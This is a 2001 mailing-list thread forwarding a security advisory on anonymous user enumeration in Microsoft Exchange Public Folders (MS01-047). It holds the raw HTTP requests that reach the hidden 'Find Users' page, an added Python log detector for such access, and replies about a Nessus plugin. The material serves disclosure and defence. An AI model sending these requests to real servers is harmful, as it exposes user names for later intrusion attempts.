Mailing List Archive

Fw: Exchange Public Folders Information Leakage
----- Original Message -----
From: "Aviram Jenik" <aviram@BEYONDSECURITY.COM>
To: <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>
Sent: Friday, September 07, 2001 11:51 AM
Subject: Exchange Public Folders Information Leakage


> The following security advisory is sent to the securiteam mailing list, and
> can be found at the SecuriTeam web site: http://www.securiteam.com
>
> SUMMARY
>
> Microsoft Exchange Server handles anonymous access to its Public Folders
> insecurely. While administrators may disable the "Find Users" features to
> prevent anonymous users from enumerating existing user names, a security
> flaw in Exchange server allows remote attackers with access to the
> exchange server to run "Find Users".
>
> DETAILS
>
> Microsoft Exchange's Public Folders options of "Find Users" can be
> disabled. This, however, does not prevent the users from directly
> accessing the ASP page (fumsg.asp). The link to the "Find Users" will be
> hidden, however it is still possible to programmatically access the
> page.
>
> Steps to recreate:
> 1) Contact:
> GET /exchange/root.asp?acs=anon HTTP/1.1
> Host: www.example.com
>
>
> 2) Access the redirected page, and resend the issued cookie.
> GET /exchange/logonfrm.asp HTTP/1.1
> Host: www.example.com
> Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
>
>
> 3) Access the redirected page, and resend the issued cookie.
> GET /exchange/root.asp?acs=anon HTTP/1.1
> Host: www.example.com
> Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
>
>
> 4) Issue this request to obtain a list of users with the letter 'a' in
> their name (e.g. Administrator)
> POST /exchange/finduser/fumsg.asp HTTP/1.1
> Host: www.example.com
> Accept: */*
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 44
> Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
>
> DN=a&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=
>
> Vendor status:
> Microsoft has been contacted on August 4, 2001. A security bulletin was
> released on September 7, 2001.
>
> Solution:
> Microsoft has released a patch for this problem. See
> <http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-047.asp>
> Microsoft Security Bulletin MS01-047 for more information.
>
>
> ADDITIONAL INFORMATION
> This security hole was discovered by <mailto:noamr@securiteam.com> Noam
> Rathaus.
> The information has been provided by <mailto:experts@secuiteam.com>
> SecuriTeam Experts.
>
>
>
> ====================
> ====================
>
> DISCLAIMER:
> The information in this bulletin is provided "AS IS" without warranty of any
> kind.
> In no event shall we be liable for any damages whatsoever including direct,
> indirect, incidental, consequential, loss of business profits or special
> damages.
>
>
============================================================================
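A defender's check for the direct page access the advisory describes, as an added example that is not part of the original posts: it scans IIS W3C extended log lines for successful requests to fumsg.asp that carry no authenticated user name. The log sample is constructed, and the field list is an assumption about how logging is configured on the server.

```python
from collections import defaultdict

# Constructed IIS W3C extended log sample (not real traffic). The selected
# fields are an assumption; the parser reads whatever #Fields declares.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status
2001-09-08 10:00:01 192.0.2.10 - GET /exchange/root.asp acs=anon 302
2001-09-08 10:00:02 192.0.2.10 - GET /exchange/logonfrm.asp - 200
2001-09-08 10:00:03 192.0.2.10 - POST /exchange/finduser/fumsg.asp - 200
2001-09-08 10:00:04 192.0.2.10 - POST /exchange/FindUser/FUMsg.asp - 200
2001-09-08 10:05:00 198.51.100.7 CORP\\alice POST /exchange/finduser/fumsg.asp - 200
2001-09-08 10:06:00 203.0.113.5 - GET /exchange/root.asp acs=anon 302
"""

FIND_USERS_PAGE = "/exchange/finduser/fumsg.asp"


def parse_w3c(text):
    """Yield one dict per request, using the #Fields directive for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def anonymous_find_users_hits(text):
    """Count successful anonymous requests to the Find Users page per client IP."""
    hits = defaultdict(int)
    for row in parse_w3c(text):
        # IIS paths are case-insensitive. The POST body (the search terms)
        # is not written to the log, so only the page access itself is visible.
        stem = row.get("cs-uri-stem", "").lower()
        anonymous = row.get("cs-username", "-") == "-"
        succeeded = row.get("sc-status", "").startswith("2")
        if stem == FIND_USERS_PAGE and anonymous and succeeded:
            hits[row["c-ip"]] += 1
    return dict(hits)


if __name__ == "__main__":
    for ip, count in anonymous_find_users_hits(SAMPLE_LOG).items():
        print(f"{ip}: {count} anonymous Find Users request(s)")
```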
Re: Exchange Public Folders Information Leakage
Hi,

Would a plugin writer note write a plugin for an advisory he releases :} ?
It's online at: http://scripts.nessus.org


Thanks
Noam Rathaus
http://www.SecuriTeam.com
http://www.BeyondSecurity.com

Know that you're safe (against Code Red and other vulnerabilities):
http://www.AutomatedScanning.com/


----- Original Message -----
From: Felix Huber
To: plugins-writers@list.nessus.org
Sent: Friday, September 07, 2001 22:55
Subject: Fw: Exchange Public Folders Information Leakage



============================================================================
Re: Exchange Public Folders Information Leakage
Sorry,

Note = Not

Thanks
Noam Rathaus
http://www.SecuriTeam.com
http://www.BeyondSecurity.com

Know that you're safe (against Code Red and other vulnerabilities):
http://www.AutomatedScanning.com/


----- Original Message -----
From: Noam Rathaus
To: Felix Huber ; plugins-writers@list.nessus.org
Sent: Friday, September 07, 2001 23:51
Subject: Re: Exchange Public Folders Information Leakage

